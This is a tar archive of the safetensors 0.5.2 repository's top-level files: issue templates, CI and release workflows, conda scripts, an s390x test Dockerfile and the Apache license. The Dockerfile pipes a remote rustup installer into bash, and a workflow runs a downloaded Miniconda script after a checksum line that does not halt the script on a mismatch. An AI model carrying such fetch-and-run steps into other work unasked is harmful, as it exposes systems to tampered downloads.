pax_global_header00006660000000000000000000000064147375337230014530gustar00rootroot0000000000000052 comment=f05a1ec483c470202a3413772eef8eab6c3a8ba0 safetensors-0.5.2/000077500000000000000000000000001473753372300140705ustar00rootroot00000000000000safetensors-0.5.2/.dockerignore000066400000000000000000000001001473753372300165330ustar00rootroot00000000000000safetensors/target bindings/python/target Dockerfile.s390x.test safetensors-0.5.2/.github/000077500000000000000000000000001473753372300154305ustar00rootroot00000000000000safetensors-0.5.2/.github/ISSUE_TEMPLATE/000077500000000000000000000000001473753372300176135ustar00rootroot00000000000000safetensors-0.5.2/.github/ISSUE_TEMPLATE/bug-report.yml000066400000000000000000000101671473753372300224310ustar00rootroot00000000000000name: "\U0001F41B Bug Report" description: Submit a bug report to help us improve safetensors body: - type: textarea id: system-info attributes: label: System Info description: Please share your system info with us. You can run the command `transformers-cli env` and copy-paste its output below. placeholder: safetensors version, platform, python version, ... validations: required: true # - type: textarea # id: who-can-help # attributes: # label: Who can help? # description: | # Your issue will be replied to more quickly if you can figure out the right person to tag with @ # If you know how to use git blame, that is the easiest way, otherwise, here is a rough guide of **who to tag**. # # All issues are read by one of the core maintainers, so if you don't know who to tag, just leave this blank and # a core maintainer will ping the right person. # # Please tag fewer than 3 people. # # Models: # - text models: @ArthurZucker and @younesbelkada # - vision models: @amyeroberts # - speech models: @sanchit-gandhi # - graph models: @clefourrier # # Library: # # - flax: @sanchit-gandhi # - generate: @gante # - pipelines: @Narsil # - tensorflow: @gante and @Rocketknight1 # - tokenizers: @ArthurZucker # - trainer: @sgugger # # Integrations: # # - deepspeed: HF Trainer: @stas00, Accelerate: @pacman100 # - ray/raytune: @richardliaw, @amogkam # - Big Model Inference: @sgugger @muellerzr # # Documentation: @sgugger, @stevhliu and @MKhalusova # # Model hub: # - for issues with a model, report at https://discuss.huggingface.co/ and tag the model's creator. # # HF projects: # # - accelerate: [different repo](https://github.com/huggingface/accelerate) # - datasets: [different repo](https://github.com/huggingface/datasets) # - diffusers: [different repo](https://github.com/huggingface/diffusers) # - rust tokenizers: [different repo](https://github.com/huggingface/tokenizers) # # Maintained examples (not research project or legacy): # # - Flax: @sanchit-gandhi # - PyTorch: @sgugger # - TensorFlow: @Rocketknight1 # Research projects are not maintained and should be taken as is. # placeholder: "@Username ..." - type: checkboxes id: information-scripts-examples attributes: label: Information description: 'The problem arises when using:' options: - label: "The official example scripts" - label: "My own modified scripts" - type: textarea id: reproduction validations: required: true attributes: label: Reproduction description: | Please provide a code sample that reproduces the problem you ran into. It can be a Colab link or just a code snippet. If you have code snippets, error messages, stack traces please provide them here as well. Important! Use code tags to correctly format your code. See https://help.github.com/en/github/writing-on-github/creating-and-highlighting-code-blocks#syntax-highlighting Do not use screenshots, as they are hard to read and (more importantly) don't allow others to copy-and-paste your code. placeholder: | Steps to reproduce the behavior: 1. 2. 3. - type: textarea id: expected-behavior validations: required: true attributes: label: Expected behavior description: "A clear and concise description of what you would expect to happen." safetensors-0.5.2/.github/ISSUE_TEMPLATE/config.yml000066400000000000000000000000501473753372300215760ustar00rootroot00000000000000blank_issues_enabled: true version: 2.1 safetensors-0.5.2/.github/ISSUE_TEMPLATE/feature-request.yml000066400000000000000000000021121473753372300234530ustar00rootroot00000000000000name: "\U0001F680 Feature request" description: Submit a proposal/request for a new safetensors feature labels: [ "feature" ] body: - type: textarea id: feature-request validations: required: true attributes: label: Feature request description: | A clear and concise description of the feature proposal. Please provide a link to the paper and code in case they exist. - type: textarea id: motivation validations: required: true attributes: label: Motivation description: | Please outline the motivation for the proposal. Is your feature request related to a problem? e.g., I'm always frustrated when [...]. If this is related to another GitHub issue, please link here too. - type: textarea id: contribution validations: required: true attributes: label: Your contribution description: | Is there any way that you could help, e.g. by submitting a PR? Make sure to read the CONTRIBUTING.MD [readme](https://github.com/huggingface/safetensors/blob/main/CONTRIBUTING.md) safetensors-0.5.2/.github/PULL_REQUEST_TEMPLATE.md000066400000000000000000000016641473753372300212400ustar00rootroot00000000000000# What does this PR do? Fixes # (issue) or description of the problem this PR solves. safetensors-0.5.2/.github/conda/000077500000000000000000000000001473753372300165145ustar00rootroot00000000000000safetensors-0.5.2/.github/conda/bld.bat000066400000000000000000000000771473753372300177510ustar00rootroot00000000000000cd bindings\python %PYTHON% -m pip install . --prefix=%PREFIX% safetensors-0.5.2/.github/conda/build.sh000066400000000000000000000000751473753372300201510ustar00rootroot00000000000000cd bindings/python $PYTHON -m pip install . --prefix=$PREFIX safetensors-0.5.2/.github/conda/meta.yaml000066400000000000000000000007131473753372300203270ustar00rootroot00000000000000{% set name = "safetensors" %} package: name: "{{ name|lower }}" version: "{{ SAFETENSORS_VERSION }}" source: path: ../../ requirements: host: - pip - python x.x - setuptools - setuptools-rust - maturin run: - python x.x test: imports: - safetensors about: home: https://huggingface.co/docs/safetensors license: Apache License 2.0 license_file: LICENSE summary: "Safe and portable way of storing tensors" safetensors-0.5.2/.github/stale.yml000066400000000000000000000012541473753372300172650ustar00rootroot00000000000000# Number of days of inactivity before an issue becomes stale daysUntilStale: 60 # Number of days of inactivity before a stale issue is closed daysUntilClose: 7 # Issues with these labels will never be considered stale exemptLabels: - pinned - security # Label to use when marking an issue as stale staleLabel: wontfix # Comment to post when marking an issue as stale. Set to `false` to disable markComment: > This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions. # Comment to post when closing a stale issue. Set to `false` to disable closeComment: false safetensors-0.5.2/.github/workflows/000077500000000000000000000000001473753372300174655ustar00rootroot00000000000000safetensors-0.5.2/.github/workflows/build_documentation.yml000066400000000000000000000011721473753372300242410ustar00rootroot00000000000000name: Build documentation on: push: branches: - main - doc-builder* - v*-release - use_templates jobs: build: uses: huggingface/doc-builder/.github/workflows/build_main_documentation.yml@main with: commit_sha: ${{ github.sha }} package: safetensors notebook_folder: safetensors_doc package_path: safetensors/bindings/python/ version_tag_suffix: bindings/python/py_src/ install_rust: true custom_container: huggingface/transformers-doc-builder secrets: token: ${{ secrets.HUGGINGFACE_PUSH }} hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }} safetensors-0.5.2/.github/workflows/build_pr_documentation.yml000066400000000000000000000013051473753372300247400ustar00rootroot00000000000000name: Build PR Documentation on: pull_request: paths: - "docs/**" - "bindings/python/py_src/**" - ".github/workflows/build_pr_documentation.yml" concurrency: group: ${{ github.workflow }}-${{ github.head_ref || github.run_id }} cancel-in-progress: true jobs: build: uses: huggingface/doc-builder/.github/workflows/build_pr_documentation.yml@main with: commit_sha: ${{ github.event.pull_request.head.sha }} pr_number: ${{ github.event.number }} package: safetensors package_path: safetensors/bindings/python/ version_tag_suffix: bindings/python/py_src/ install_rust: true custom_container: huggingface/transformers-doc-builder safetensors-0.5.2/.github/workflows/codecov.yml000066400000000000000000000015441473753372300216360ustar00rootroot00000000000000name: Code coverage on: push: branches: - main jobs: build: runs-on: ubuntu-latest defaults: run: working-directory: ./safetensors steps: - uses: actions/checkout@v3 - name: Install Rust Stable uses: actions-rs/toolchain@v1 with: toolchain: stable components: llvm-tools-preview override: true - uses: Swatinem/rust-cache@v2 - name: Install cargo-llvm-cov for Ubuntu run: cargo install cargo-llvm-cov - name: Coverage report run: cargo llvm-cov --release --lcov --output-path lcov.info - name: Upload to codecov.io uses: codecov/codecov-action@v3 with: token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos working-directory: ./safetensors fail_ci_if_error: true safetensors-0.5.2/.github/workflows/delete_doc_comment.yml000066400000000000000000000004401473753372300240170ustar00rootroot00000000000000name: Delete doc comment on: workflow_run: workflows: ["Delete doc comment trigger"] types: - completed jobs: delete: uses: huggingface/doc-builder/.github/workflows/delete_doc_comment.yml@main secrets: comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}safetensors-0.5.2/.github/workflows/delete_doc_comment_trigger.yml000066400000000000000000000003521473753372300255440ustar00rootroot00000000000000name: Delete doc comment trigger on: pull_request: types: [ closed ] jobs: delete: uses: huggingface/doc-builder/.github/workflows/delete_doc_comment_trigger.yml@main with: pr_number: ${{ github.event.number }}safetensors-0.5.2/.github/workflows/python-bench.yml000066400000000000000000000034311473753372300226070ustar00rootroot00000000000000name: Simple benchmarks on: push: branches: - main permissions: # deployments permission to deploy GitHub pages website deployments: write # contents permission to update benchmark contents in gh-pages branch contents: write jobs: benchmark: name: Performance regression check runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Install Rust uses: actions-rs/toolchain@v1 with: toolchain: stable components: rustfmt, clippy - name: Install Python uses: actions/setup-python@v2 with: python-version: "3.10" architecture: "x64" - name: Install working-directory: ./bindings/python run: | pip install -U pip pip install .[dev] - name: Run tests working-directory: ./bindings/python run: | cargo test pytest --benchmark-json output.json benches/ # Download previous benchmark result from cache (if exists) - name: Download previous benchmark data uses: actions/cache@v1 with: path: ./cache key: ${{ runner.os }}-benchmark # Run `github-action-benchmark` action - name: Store benchmark result uses: benchmark-action/github-action-benchmark@v1 with: # What benchmark tool the output.txt came from tool: 'pytest' # Where the output from the benchmark tool is stored output-file-path: ./bindings/python/output.json github-token: ${{ secrets.GITHUB_TOKEN }} # Push and deploy GitHub pages branch automatically auto-push: true comment-on-alert: true # Mention @rhysd in the commit comment alert-comment-cc-users: '@Narsil' safetensors-0.5.2/.github/workflows/python-release-conda.yml000066400000000000000000000075731473753372300242450ustar00rootroot00000000000000name: Python Release - Conda on: push: tags: - v* env: ANACONDA_API_TOKEN: ${{ secrets.ANACONDA_API_TOKEN }} jobs: build_and_package: runs-on: ${{ matrix.os }} strategy: matrix: os: [windows-latest, macos-latest] # 3.11 not available on Conda yet. python: ["3.8", "3.9", "3.10", "3.11"] steps: - name: Checkout repository uses: actions/checkout@v3 - name: Install miniconda uses: conda-incubator/setup-miniconda@v2 with: auto-update-conda: true python-version: ${{ matrix.python }} - name: Conda info shell: bash -l {0} run: conda info - name: Install Rust uses: actions-rs/toolchain@v1 with: toolchain: stable - name: Setup conda env shell: bash -l {0} run: | conda install setuptools-rust conda install -c defaults anaconda-client conda-build - name: Extract version shell: bash -l {0} working-directory: ./bindings/python run: echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV - name: Build conda packages shell: bash -l {0} run: | conda info conda list conda-build .github/conda --python=${{ matrix.python }} - name: Upload to Anaconda shell: bash -l {0} run: | anaconda upload `conda-build .github/conda --output` --force build_and_package_linux: runs-on: ubuntu-latest container: quay.io/pypa/manylinux2014_x86_64 strategy: fail-fast: false matrix: python: [38, 39, 310, 311] include: - python: 38 checksum: e2a4438671e0e42c5bba14cb51de6ce9763938184d6ca2967340bbe972bbe7e6 - python: 39 checksum: 9829d95f639bd0053b2ed06d1204e60644617bf37dd5cc57523732e0e8d64516 - python: 310 checksum: ea5e6e8a3d5a0247b9df85382d27220fac8e59b5778fd313c5913879cd9baafc - python: 311 checksum: 634d76df5e489c44ade4085552b97bebc786d49245ed1a830022b0b406de5817 steps: - name: Checkout repository uses: actions/checkout@v2 - name: Install miniconda run: | yum install -y wget openssl-devel export FILENAME=Miniconda3-py${{ matrix.python }}_23.5.2-0-Linux-x86_64.sh wget https://repo.anaconda.com/miniconda/$FILENAME sha256sum $FILENAME | awk '$1=="${{ matrix.checksum}}"{print"good to go"}' bash $FILENAME -b -p $HOME/miniconda source $HOME/miniconda/bin/activate - name: Show glibc information shell: bash -l {0} run: ldd --version - name: Conda info shell: bash -l {0} run: | source $HOME/miniconda/bin/activate conda info - name: Install Rust uses: actions-rs/toolchain@v1 with: toolchain: stable - name: Setup conda env shell: bash -l {0} run: | source $HOME/miniconda/bin/activate conda install setuptools-rust conda install -c defaults anaconda-client conda-build - name: Extract version shell: bash -l {0} working-directory: ./bindings/python run: | source $HOME/miniconda/bin/activate echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV - name: Build conda packages shell: bash -l {0} run: | source $HOME/miniconda/bin/activate conda info conda list conda-build .github/conda --python=${{ matrix.python }} - name: Upload to Anaconda shell: bash -l {0} run: | source $HOME/miniconda/bin/activate anaconda upload `conda-build .github/conda --output` --force safetensors-0.5.2/.github/workflows/python-release.yml000066400000000000000000000116521473753372300231540ustar00rootroot00000000000000# This file is autogenerated by maturin v1.7.4 # To update, run # # maturin generate-ci github -m bindings/python/Cargo.toml # name: CI on: push: branches: - main - master tags: - '*' pull_request: workflow_dispatch: permissions: contents: read jobs: linux: runs-on: ${{ matrix.platform.runner }} strategy: matrix: platform: - runner: ubuntu-latest target: x86_64 - runner: ubuntu-latest target: x86 - runner: ubuntu-latest target: aarch64 - runner: ubuntu-latest target: armv7 - runner: ubuntu-latest target: s390x - runner: ubuntu-latest target: ppc64le steps: - uses: actions/checkout@v4 - uses: actions/setup-python@v5 with: python-version: 3.x - name: Build wheels uses: PyO3/maturin-action@v1 with: target: ${{ matrix.platform.target }} args: --release --out dist --manifest-path bindings/python/Cargo.toml sccache: 'true' manylinux: auto - name: Upload wheels uses: actions/upload-artifact@v4 with: name: wheels-linux-${{ matrix.platform.target }} path: dist musllinux: runs-on: ${{ matrix.platform.runner }} strategy: matrix: platform: - runner: ubuntu-latest target: x86_64 - runner: ubuntu-latest target: x86 - runner: ubuntu-latest target: aarch64 - runner: ubuntu-latest target: armv7 steps: - uses: actions/checkout@v4 - uses: actions/setup-python@v5 with: python-version: 3.x - name: Build wheels uses: PyO3/maturin-action@v1 with: target: ${{ matrix.platform.target }} args: --release --out dist --manifest-path bindings/python/Cargo.toml sccache: 'true' manylinux: musllinux_1_2 - name: Upload wheels uses: actions/upload-artifact@v4 with: name: wheels-musllinux-${{ matrix.platform.target }} path: dist windows: runs-on: ${{ matrix.platform.runner }} strategy: matrix: platform: - runner: windows-latest target: x64 - runner: windows-latest target: x86 steps: - uses: actions/checkout@v4 - uses: actions/setup-python@v5 with: python-version: 3.x architecture: ${{ matrix.platform.target }} - name: Build wheels uses: PyO3/maturin-action@v1 with: target: ${{ matrix.platform.target }} args: --release --out dist --manifest-path bindings/python/Cargo.toml sccache: 'true' - name: Upload wheels uses: actions/upload-artifact@v4 with: name: wheels-windows-${{ matrix.platform.target }} path: dist macos: runs-on: ${{ matrix.platform.runner }} strategy: matrix: platform: - runner: macos-13 target: x86_64 - runner: macos-14 target: aarch64 steps: - uses: actions/checkout@v4 - uses: actions/setup-python@v5 with: python-version: 3.x - name: Build wheels uses: PyO3/maturin-action@v1 with: target: ${{ matrix.platform.target }} args: --release --out dist --manifest-path bindings/python/Cargo.toml sccache: 'true' - name: Upload wheels uses: actions/upload-artifact@v4 with: name: wheels-macos-${{ matrix.platform.target }} path: dist sdist: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - name: Build sdist uses: PyO3/maturin-action@v1 with: command: sdist args: --out dist --manifest-path bindings/python/Cargo.toml - name: Upload sdist uses: actions/upload-artifact@v4 with: name: wheels-sdist path: dist release: name: Release runs-on: ubuntu-latest if: ${{ startsWith(github.ref, 'refs/tags/') || github.event_name == 'workflow_dispatch' }} needs: [linux, musllinux, windows, macos, sdist] permissions: # Use to sign the release artifacts id-token: write # Used to upload release artifacts contents: write # Used to generate artifact attestation attestations: write steps: - uses: actions/download-artifact@v4 - name: Generate artifact attestation uses: actions/attest-build-provenance@v1 with: subject-path: 'wheels-*/*' - name: Publish to PyPI if: "startsWith(github.ref, 'refs/tags/')" uses: PyO3/maturin-action@v1 env: MATURIN_PYPI_TOKEN: ${{ secrets.PYPI_TOKEN_DIST}} with: command: upload args: --non-interactive --skip-existing wheels-*/* safetensors-0.5.2/.github/workflows/python.yml000066400000000000000000000076551473753372300215460ustar00rootroot00000000000000name: Python on: pull_request: jobs: build_and_test: name: Check everything builds & tests runs-on: ${{ matrix.os }} strategy: matrix: os: [ubuntu-latest, macos-13, windows-latest] # Lowest and highest, no version specified so that # new releases get automatically tested against version: [{torch: torch==1.10, python: "3.8"}, {torch: torch, python: "3.12"}] # TODO this would include macos ARM target. # however jax has an illegal instruction issue # that exists only in CI (probably difference in instruction support). # include: # - os: macos-latest # version: # torch: torch # python: "3.11" defaults: run: working-directory: ./bindings/python steps: - name: Checkout repository uses: actions/checkout@v3 - name: Install Rust uses: actions-rs/toolchain@v1 with: toolchain: stable components: rustfmt, clippy - name: Cargo install audit run: cargo install cargo-audit - uses: Swatinem/rust-cache@v2 with: workspaces: "bindings/python" - name: Install Python uses: actions/setup-python@v5 with: python-version: ${{ matrix.version.python }} architecture: "x64" - name: Lint with RustFmt run: cargo fmt -- --check - name: Lint with Clippy run: cargo clippy --all-targets --all-features -- -D warnings - name: Run Audit run: cargo audit -D warnings - name: Install run: | pip install -U pip pip install .[numpy,tensorflow] pip install ${{ matrix.version.torch }} - name: Install (jax, flax) if: matrix.os != 'windows-latest' run: | pip install .[jax] shell: bash - name: Install (mlx) if: matrix.os == 'macos-latest' run: | pip install .[mlx] shell: bash - name: Check style run: | pip install .[quality] black --check --line-length 119 --target-version py35 py_src/safetensors tests - name: Run tests run: | cargo test pip install .[testing] pytest -sv tests/ test_s390x_big_endian: runs-on: ubuntu-latest permissions: contents: write packages: write name: Test bigendian - S390X steps: - uses: actions/checkout@v2 - name: Set up QEMU uses: docker/setup-qemu-action@v2 - name: Set up Docker Buildx uses: docker/setup-buildx-action@v2 - name: Set short sha id: vars run: echo "GITHUB_SHA_SHORT=$(git rev-parse --short HEAD)" >> $GITHUB_ENV - name: Docker meta id: meta uses: docker/metadata-action@v4 with: # list of Docker images to use as base name for tags images: | ghcr.io/huggingface/safetensors/s390x # generate Docker tags based on the following events/attributes tags: | type=schedule type=ref,event=branch type=ref,event=pr type=semver,pattern={{version}} type=semver,pattern={{major}}.{{minor}} type=semver,pattern={{major}} type=sha - name: Login to Registry uses: docker/login-action@v3 with: registry: ghcr.io username: ${{ github.actor }} password: ${{ secrets.GITHUB_TOKEN }} - name: Test big endian uses: docker/build-push-action@v4 with: platforms: linux/s390x file: Dockerfile.s390x.test tags: ${{ steps.meta.outputs.tags }} labels: ${{ steps.meta.outputs.labels }} cache-from: type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max cache-to: type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max safetensors-0.5.2/.github/workflows/rust-release.yml000066400000000000000000000013051473753372300226220ustar00rootroot00000000000000name: Rust Release env: CRATES_TOKEN: ${{ secrets.CRATES_TOKEN }} on: push: tags: - v* jobs: rust_publish: runs-on: ubuntu-latest steps: - name: Checkout repository uses: actions/checkout@v3 - name: Install Rust uses: actions-rs/toolchain@v1 with: toolchain: stable - name: Cache Cargo Registry uses: actions/cache@v1 with: path: ~/.cargo/registry key: ubuntu-latest-cargo-registry-${{ hashFiles('**/Cargo.toml') }} - name: Publish package rust if: ${{ !contains(github.ref, 'rc') }} working-directory: ./safetensors run: cargo publish --token ${CRATES_TOKEN} safetensors-0.5.2/.github/workflows/rust.yml000066400000000000000000000031611473753372300212060ustar00rootroot00000000000000name: Rust on: pull_request: jobs: build: runs-on: ${{ matrix.os }} strategy: matrix: os: [ubuntu-latest, windows-latest, macOS-latest] defaults: run: working-directory: ./safetensors steps: - uses: actions/checkout@v3 - name: Install Rust Stable uses: actions-rs/toolchain@v1 with: toolchain: stable components: rustfmt, clippy, llvm-tools-preview override: true - uses: Swatinem/rust-cache@v2 - name: Install cargo-audit run: cargo install cargo-audit - name: Install cargo-llvm-cov for Ubuntu if: matrix.os == 'ubuntu-latest' run: cargo install cargo-llvm-cov - name: Build run: cargo build --all-targets --verbose - name: Lint with Clippy run: cargo clippy --all-targets -- -D warnings - name: Run Tests run: cargo test --verbose - name: Run No-STD Tests run: cargo test --no-default-features --features alloc --verbose - name: Run Audit # RUSTSEC-2021-0145 is criterion so only within benchmarks run: cargo audit -D warnings --ignore RUSTSEC-2021-0145 - name: Coverage report if: matrix.os == 'ubuntu-latest' run: cargo llvm-cov --release --lcov --output-path lcov.info # - name: Upload to codecov.io # if: matrix.os == 'ubuntu-latest' # uses: codecov/codecov-action@v3 # with: # token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos # working-directory: ./safetensors # fail_ci_if_error: true safetensors-0.5.2/.github/workflows/stale.yml000066400000000000000000000006261473753372300213240ustar00rootroot00000000000000name: 'Close stale issues and PRs' on: schedule: - cron: '30 1 * * *' jobs: stale: runs-on: ubuntu-latest steps: - uses: actions/stale@v8 with: stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.' days-before-stale: 30 days-before-close: 5 safetensors-0.5.2/.github/workflows/trufflehog.yml000066400000000000000000000004001473753372300223470ustar00rootroot00000000000000on: push: name: Secret Leaks jobs: trufflehog: runs-on: ubuntu-latest steps: - name: Checkout code uses: actions/checkout@v4 with: fetch-depth: 0 - name: Secret Scanning uses: trufflesecurity/trufflehog@main safetensors-0.5.2/.github/workflows/upload_pr_documentation.yml000066400000000000000000000006001473753372300251220ustar00rootroot00000000000000name: Upload PR Documentation on: workflow_run: workflows: ["Build PR Documentation"] types: - completed jobs: build: uses: huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml@main with: package_name: safetensors secrets: hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }} comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}safetensors-0.5.2/.gitignore000066400000000000000000000002011473753372300160510ustar00rootroot00000000000000safetensors/target safetensors/**/Cargo.lock bindings/python/Cargo.lock *.bin *.h5 *.msgpack *.pt *.pdparams *.safetensors *.npz safetensors-0.5.2/.pre-commit-config.yaml000066400000000000000000000027111473753372300203520ustar00rootroot00000000000000repos: - repo: https://github.com/Narsil/pre-commit-rust rev: 0c016cee78144d06d906fccc7715d607a946ca5c hooks: - id: fmt name: "Rust (fmt)" args: ["--manifest-path", "safetensors/Cargo.toml", "--"] - id: clippy name: "Rust (clippy)" args: [ "--manifest-path", "safetensors/Cargo.toml", "--all-features", "--all-targets", "--", "-Dwarnings", ] - repo: https://github.com/Narsil/pre-commit-rust rev: 0c016cee78144d06d906fccc7715d607a946ca5c hooks: - id: fmt name: "Python (fmt)" args: ["--manifest-path", "bindings/python/Cargo.toml", "--"] - id: clippy name: "Python (clippy)" args: [ "--manifest-path", "bindings/python/Cargo.toml", "--all-features", "--all-targets", "--", "-Dwarnings", ] - repo: https://github.com/psf/black rev: 22.3.0 hooks: - id: black name: "Python (black)" args: ["--line-length", "119", "--target-version", "py35"] types: ["python"] - repo: https://github.com/pycqa/flake8 rev: 3.8.3 hooks: - id: flake8 args: ["--config", "bindings/python/setup.cfg"] - repo: https://github.com/pre-commit/mirrors-isort rev: v5.7.0 # Use the revision sha / tag you want to point at hooks: - id: isort safetensors-0.5.2/Dockerfile.s390x.test000066400000000000000000000022501473753372300177240ustar00rootroot00000000000000FROM s390x/python RUN wget https://repo.anaconda.com/miniconda/Miniconda3-py311_23.5.2-0-Linux-s390x.sh \ && bash Miniconda3-py311_23.5.2-0-Linux-s390x.sh -b \ && rm -f Miniconda3-py311_23.5.2-0-Linux-s390x.sh RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | bash -s -- -y RUN /root/miniconda3/bin/conda install pytorch cpuonly -c pytorch -y WORKDIR /safetensors/ RUN /root/miniconda3/bin/pip install -U pip pytest # RUN /root/miniconda3/bin/pip install -U huggingface_hub # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors")' COPY . . SHELL ["/bin/bash", "-c"] WORKDIR /safetensors/bindings/python/ RUN source /root/.cargo/env && /root/miniconda3/bin/pip install -e . RUN /root/miniconda3/bin/pytest -sv tests/test_pt_* tests/test_simple.py # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors"); from safetensors.torch import load_file; weights = load_file(filename); assert weights["roberta.embeddings.position_embeddings.weight"][0][0].abs().item() > 1e-10' ENTRYPOINT /bin/bash safetensors-0.5.2/LICENSE000066400000000000000000000261351473753372300151040ustar00rootroot00000000000000 Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS 